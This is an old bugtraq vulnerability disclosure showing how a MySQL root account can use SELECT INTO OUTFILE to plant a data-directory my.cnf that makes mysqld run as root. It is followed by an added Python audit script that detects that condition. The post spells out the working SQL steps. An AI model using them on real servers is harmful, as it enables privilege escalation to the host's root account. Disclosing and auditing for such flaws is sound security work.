
List:       bugtraq
Subject:    MySQL user can be changed to root
From:       "bugsman () libero ! it" <bugsman () libero ! it>
Date:       2003-03-08 11:58:37

Hi. I tried this on my own MySQL 3.23.55 !!!
I found out that, logging in as the root user, we can change mysqld to run as root
instead of, e.g., mysql, but this works only if there's just one my.cnf file and it is
located in /etc... Here's how I did it...

I logged in as root and then I did this:

mysql>CREATE DATABASE roottext;
mysql>USE roottext;
mysql>CREATE TABLE hack (conf VARCHAR(80));
mysql>INSERT INTO hack VALUES ('[mysqld]');
mysql>INSERT INTO hack VALUES ('user=root');
mysql>SELECT * INTO OUTFILE '/path/to/mysql/datadir/my.cnf' FROM hack;
mysql>QUIT

Doing so we have created a my.cnf in the mysql datadir containing:

[mysqld]
user=root

Now, when the mysql server is restarted, the user option in our datadir my.cnf
will override the one in /etc/my.cnf and the mysql server will run as root, with all the
security flaws that it entails... This is very dangerous if we think that in mysql <=
3.23.53 it is really easy to get root access due to a bug (an exploit has been
released publicly)... I dunno how this problem can be solved, I'd like to hear
something from you... Thanks.... :)
by
Gufino
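
A defender-side check for the condition described in the message above, as an added example that is not part of the original post: it resolves the effective [mysqld] user across /etc/my.cnf and a my.cnf in the data directory (the override order the message describes) and flags a datadir option file or a root setting. The function names, the simplified option-file parsing and the temporary sample files are assumptions constructed for illustration.

```python
import os
import tempfile

def mysqld_user(path):
    """Return the user= value from the [mysqld] group of one option file, or None."""
    section, user = None, None
    with open(path, encoding="latin-1") as fh:
        for raw in fh:
            line = raw.strip()
            if not line or line[0] in "#;":
                continue  # blank line or comment
            if line.startswith("[") and line.endswith("]"):
                section = line[1:-1].strip().lower()
            elif section == "mysqld" and "=" in line:
                key, value = (part.strip() for part in line.split("=", 1))
                if key.lower() == "user":
                    user = value  # last assignment in the file wins
    return user

def audit(etc_cnf, datadir):
    """Resolve the effective mysqld user and list findings (assumed read order)."""
    findings, effective, source = [], None, None
    datadir_cnf = os.path.join(datadir, "my.cnf")
    for path in (etc_cnf, datadir_cnf):  # the later file overrides the earlier one
        if os.path.isfile(path):
            user = mysqld_user(path)
            if user is not None:
                effective, source = user, path
    if os.path.isfile(datadir_cnf):
        findings.append("option file present in datadir: " + datadir_cnf)
    if effective == "root":
        findings.append("mysqld would start as root (set in %s)" % source)
    return effective, findings

def demo():
    # Constructed sample: a sane global file, then the planted datadir file.
    with tempfile.TemporaryDirectory() as root:
        etc_cnf = os.path.join(root, "etc_my.cnf")
        datadir = os.path.join(root, "datadir")
        os.mkdir(datadir)
        with open(etc_cnf, "w") as fh:
            fh.write("[mysqld]\nuser=mysql\n")
        before = audit(etc_cnf, datadir)
        with open(os.path.join(datadir, "my.cnf"), "w") as fh:
            fh.write("[mysqld]\nuser=root\n")
        after = audit(etc_cnf, datadir)
    return before, after

if __name__ == "__main__":
    print(demo())
```

On a real host, pass the actual global option file and data directory to audit() and treat any finding as a reason to inspect who can write to the data directory.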

